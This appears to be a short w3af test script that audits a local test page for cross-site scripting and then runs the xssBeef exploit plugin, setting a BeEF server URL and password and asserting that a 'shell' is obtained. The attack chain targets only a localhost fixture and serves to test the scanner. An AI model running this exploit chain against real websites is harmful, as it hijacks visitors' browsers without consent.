# xss exploit using beef

plugins
output console,textFile
output config textFile
set fileName output-w3af.txt
set verbose True
back
output config console
set verbose False
back

audit xss
back

target
set target http://localhost/w3af/audit/xss/simple_xss.php?text=1
back

start

exploit
exploit config xssBeef
set beefURL http://localhost/beef/
set beefPasswd BeEFConfigPass
view
back
exploit xssBeef

assert len(kb.kb.getData('xssBeef','shell')) == 1

back
exit